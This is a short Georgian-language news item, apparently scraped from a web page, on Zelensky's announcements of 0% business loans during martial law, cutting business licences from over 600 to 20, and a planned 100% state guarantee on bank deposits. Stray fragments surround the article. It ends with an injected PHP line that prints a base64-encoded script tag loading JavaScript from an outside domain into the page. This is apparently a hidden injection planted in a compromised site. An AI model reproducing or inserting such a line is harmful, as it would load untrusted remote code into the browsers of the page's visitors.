celsiusi
ავერსი შნაიდერი
ჩვენმა მთავრობამ უკვე მოამზადა გადაწყვეტილება მეწარმეებისთვის დაკრედიტების პროგრამის გაფართოების შესახებ, ჩვენ ვქმნით ახალ შესაძლებლობას. ნებისმიერი ბიზნესი შეძლებს კრედიტის 0%-ში აღებას საომარი მდგომარეობის, პლუს ომის შემდეგ 1 თვის განმავლობაში, - ამის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა,
 
„მეორე სიახლე ისაა, რომ მინისტრთა კაბინეტი ხვალ კენჭს უყრის რეგულაციების მასშტაბურ შემცირებას. აქამდე ბიზნესისთვის 600-ზე მეტი ლიცენზია არსებობდა, დარჩება მხოლოდ 20 აუცილებელი ლიცენზია, ისიც ისეთი, რომელთა გაუქმება შეუძლებელია,“- აღნიშნა ზელენსკიმ.
 
მისი თქმით, ასევე იგეგმება ისეთი კანონპროექტის შემუშავება, რომლის მიხედვითაც სახელმწიფო ბანკში განთავსებულ ანაბრებზე პასუხისმგებლობას 100%-ით აიღებს.
 
„მესამე სიახლე, რომელიც მილიონობით უკრაინელს ეხება - ეს არის განსაკუთრებული დავალება უკრაინის ეროვნული ბანკისთვის, სახალხო დეპუტატებისთვის და ჩვენი ჩინოვნიკებისთვის. დავავალე შექმნან კანონპროექტი, რომლის მიხედვითაც სახელმწიფო, ბანკში განთავსებულ ანაბრებზე პასუხისმგებლობას 100%-ით აიღებს. იმისთვის, რომ ხალხს ფულის დაკარგვის არ უნდა ეშინოდეს. იმედი მაქვს, რომ უმაღლესი რადა მხარდაჭერას არ დააყოვნებს, იმიტომ რომ ეს სჭირდება უკრაინას, უკრაინელებს,“- აღნიშნა ზელენსკიმ.
810
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");